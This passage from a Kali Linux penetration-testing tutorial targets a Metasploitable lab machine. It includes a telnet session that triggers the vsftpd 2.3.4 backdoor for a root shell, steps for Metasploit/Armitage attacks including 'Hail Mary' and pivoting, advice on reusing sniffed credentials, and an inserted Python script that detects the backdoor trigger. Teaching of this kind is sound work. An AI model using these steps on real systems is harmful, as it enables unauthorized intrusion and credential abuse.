version information to find what vulnerabilities exist and whether there are exploits available. Kali Linux even 
helps us out here by providing a tool to search for exploits, searchsploit. 

Using our port information for our Metasploitable instance, we can run through each and see if we find 
anything. For example, running searchsploit bind 9.4.2 gives us a hit. 


root@kali:~# searchsploit bind 9.4.2 
Description                                                    Path 
-------------------------------------------------------------- ------------------------- 
BIND 9.4.1-9.4.2 - Remote DNS Cache Poisoning Flaw Exploit (meta)  /multiple/remote/6122.rb 
root@kali:~# 

Figure 7. Running searchsploit bind 9.4.2 

If our engagement involves a vulnerability assessment, Kali Linux provides us with a great tool for 
conducting assessments, OpenVAS. OpenVAS allows you to set up target lists, create schedules, define 
what sort of tests are to be run, and of course execute the test. I’ve run OpenVAS against our Metasploitable 
instance to see what it finds. To do so, we first set up our target in the Targets tab at the bottom right of the 
GUI. Next we switch to the Tasks tab and set a task of running the scan against the target. For the purposes 
of the demo, I set the target to the Metasploitable target and set the Scan Config option to “Full and 
very deep ultimate.” Depending on your engagement you can adjust the Scan Config. You can even switch 
to the Scan Configs tab and define your own scan configs to do things like only run certain types of 
checks. This may be helpful for doing scans based on compliance guidelines. While we’re exploring some 
of the options, it’s worth mentioning there is a tab to supply credentials to the scan, which will enhance 
your results. If your client wants a deeper, more accurate report they may supply you with domain/root 
credentials so the scanner can get onto the system and get better results. It may also be the case that while 
you were watching traffic in Wireshark you managed to get some credentials, which you can now enter into 
the scanner to get more info on that device and quite possibly, if the credentials are used elsewhere, you 
can get into those systems too. Once our scan is complete, OpenVAS presents us with a nice dashboard 
showing some highlights of the scan results. 

[Screenshot: Greenbone Security Desktop dashboard after the scan] 

Figure 8. OpenVAS dashboard 


We can quickly see there are 47 High Risk vulnerabilities found during our scan. Clicking on the Reports tab 
in the bottom right of the screen and then the magnifying glass button we can see our results, open in a new 
tab. From here, we can view the results or we can choose various export formats and save the report. 
In general, I usually export as PDF to include in my findings document I turn in to the client. The reports are 
not flashy, but they get you the data you need. 


[Screenshot: the exported OpenVAS PDF report opened in a document viewer; its index lists Result Overview and Results per Host, and the first result shown is a High-severity finding on an FTP port] 

Figure 9. Data 


The layout is pretty self explanatory, and the Index included in the PDF can help you navigate right to the 
vulnerability you want to investigate further. The screenshot shows the first one in the list. In this case we have 
a backdoor vulnerability in vsftpd. Included in all results is a summary of the issue, a solution to resolve it (if 
available), and some reference links to learn more about the vulnerability, which can be used to find an actual 
exploit for the vulnerability. Now that we have a vulnerability, let’s go ahead and take a look at an exploit. 


Exploiting Targets 

Previously, we found a bunch of vulnerabilities on our Metasploitable instance. No surprise considering it’s 
designed that way. Let’s take a look at the above-mentioned issue and see how we can exploit it. In this case, 
we can do it without any additional tools. There is a simple backdoor that is ready to exploit. Simply putting 
an emoticon smiley face at the end of the user name opens a listening shell on port 6200. Let’s try. 


root@kali:~# telnet 192.168.1.119 21 
Trying 192.168.1.119... 
Connected to 192.168.1.119. 
Escape character is '^]'. 
220 (vsFTPd 2.3.4) 
user oops:) 
331 Please specify the password. 
pass doesnotmatter 
^] 
telnet> quit 
Connection closed. 
root@kali:~# telnet 192.168.1.119 6200 
Trying 192.168.1.119... 
Connected to 192.168.1.119. 
Escape character is '^]'. 
id; 
uid=0(root) gid=0(root) 

Figure 10. Port 6200 
We open a terminal and telnet to port 21. Once connected we simply enter user oops:) followed by pass 
with anything you choose, as it doesn't matter. Escape the session, telnet to port 6200, and we are in. 
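From the defender's side, the same backdoor is easy to spot in FTP command logs: a USER argument containing ":)" followed by a connection from the same source to 6200/tcp. The following detection logic is an added example, not code from the article; it assumes a constructed, simplified log format of "timestamp src_ip dst_port data", and the sample records are made up.

```python
"""Flag the vsftpd 2.3.4 backdoor trigger in FTP command logs (added example).

Assumed log format (not a real product's format): "<timestamp> <src_ip> <dst_port> <data>",
where <data> is the FTP command seen on port 21 or the word CONNECT for other ports.
"""
import re

# Constructed sample records for demonstration only
SAMPLE_LOG = """\
2014-01-10T10:00:01 10.0.0.5 21 USER alice
2014-01-10T10:00:02 10.0.0.5 21 PASS hunter2
2014-01-10T10:01:10 10.0.0.9 21 USER oops:)
2014-01-10T10:01:11 10.0.0.9 21 PASS doesnotmatter
2014-01-10T10:01:15 10.0.0.9 6200 CONNECT
2014-01-10T10:02:00 10.0.0.7 6200 CONNECT
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\d+) (.*)$")
# The backdoor is armed when the USER argument contains the ":)" sequence.
TRIGGER_RE = re.compile(r"^USER .*:\)", re.IGNORECASE)
FTP_PORT = 21
BACKDOOR_PORT = 6200


def find_backdoor_activity(log_text):
    """Return a list of (src_ip, severity, reason) findings, in log order."""
    triggered = set()   # sources that have sent the trigger on port 21
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip malformed records rather than crash on them
        ts, src, port, data = m.group(1), m.group(2), int(m.group(3)), m.group(4)
        if port == FTP_PORT and TRIGGER_RE.match(data):
            triggered.add(src)
            findings.append((src, "high", f"{ts} backdoor trigger in USER command"))
        elif port == BACKDOOR_PORT:
            # A connection to 6200/tcp after the trigger is the shell being used.
            if src in triggered:
                findings.append((src, "critical", f"{ts} connect to 6200/tcp after trigger"))
            else:
                findings.append((src, "medium", f"{ts} connect to 6200/tcp without trigger seen"))
    return findings


if __name__ == "__main__":
    for finding in find_backdoor_activity(SAMPLE_LOG):
        print(finding)
```

The "medium" case covers a connection to 6200/tcp whose trigger was not logged (for example, if the FTP session was on a different sensor), which is still worth a look.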

That wasn't too terribly exciting, but mission accomplished. Had we been operating with an effort 
to remain stealthy, we could have discovered that and exploited it, all with limited ability for the target to detect our 
attack. Let's take a look at an exploit tool: Metasploit. Metasploit is an exploit framework designed for 
penetration testing. It has several interfaces that use the command line, and the latest version has a web 
interface. There is also a commercial version, but that is obviously not going to come ready to go with Kali 
Linux. Armitage is included in Kali Linux and gives us a nice interface for an attack platform. 

It uses nmap and other tools to help us find targets. Start Armitage and it will connect to Metasploit if you 
have it running; otherwise it will start the service for you. Additionally, it will provide you with some help 
when starting, such as telling you how to start the database if that is not already running. Once we get it 
open, we're ready to begin. Since we are focusing on this single server, let's go ahead and add the host to 
Armitage. Under the Hosts menu we can click Add Host and enter the IP address of our target. 

Once our host is added to Armitage, it is represented by a monitor in the main workspace. We can right 
click on it and select Scan to get some more data about it. Doing this opens a new tab on the bottom and 
we can watch the scan in action. Once complete, we can see what the OS is and the services running on 
it, similar to our findings using nmap. Right clicking the server and choosing Services opens a new tab 
that lists the available services. You can see the services below, and Armitage has given us a visual reference in 
the workspace identifying the OS of the host. This can help you when looking at a large range of hosts to 
identify various operating systems you may want to dive into. 

Figure 11. Hosts 

From here, we can search the upper left area for an exploit to use against the services. For example, going 
back to the previous exploit, which is highlighted in the above screenshot, I have searched for vsftp and 
found our exploit is available in Metasploit. 

Figure 12. Exploits 

Double clicking our exploit brings up the ability to launch the exploit. Note that launching an exploit 
this way does not fill in all the data needed to execute. In this case, we need to supply the IP of our target 
in RHOST. Once we do that and click the launch button a new tab is opened at the bottom and it shows 
us our exploit in action. We can see the exploit was successful and notice the icon in the workspace has 
changed to represent an exploited system. 
Figure 13. Icon in the workspace 

Right clicking the host in the workspace shows us a new option in the menu. This is called Shell 1, and 
going to that we can select Interact, which gives us a new tab at the bottom showing our shell. I have 
run ifconfig to verify the IP is our target system. 

Figure 14. Selecting Interact 

We can take advantage of another feature of Armitage to help us find exploits. Under the Attacks menu 
there is the option to Find Attacks. Doing this will automate the process of finding an attack suitable for 
our target and give us a new option in the pop up menu when right clicking our target in the workspace. 
Using this Attack menu, we can launch an attack directly with the attack data prefilled and ready to go. 

While we are looking at the main Attacks menu, you may have noticed the option called Hail Mary located 
under the Find Attacks option. This option will launch a flood of attacks, trying everything it can to 
infiltrate the selected targets. Using this option will light up an IDS, so if you haven't already, make 
sure you are whitelisted on the client's IDS so you don't overwhelm the system. After launching the Hail 
Mary option, it will open a new tab below and show all the attacks being launched. When it's complete it 
will list the shells it opened, and right clicking our target in the workspace shows us a list of shells we can 
then select to interact with. 

Figure 15. List of shells 

From this point, we can use the compromised machine to pivot and launch attacks against other systems on 
the network through this compromised host, all while remaining inside our Armitage work environment. 

Conclusion 

Kali Linux is a versatile tool and should be a part of every penetration tester's arsenal. It is a complete attack 
tool and can be run as a Live CD (which is excellent if you are working on a forensics project), or be installed 
directly to a machine or virtual machine. Of course, you can always add any other tools you come across that 
are not part of Kali. I have been in this business for years, and BackTrack/Kali is my OS of choice on all my 
penetration testing engagements. We've only scratched the surface of what it has to offer. I hope you've 
enjoyed this introduction, and I encourage you to dive in and learn every tool it has to offer. 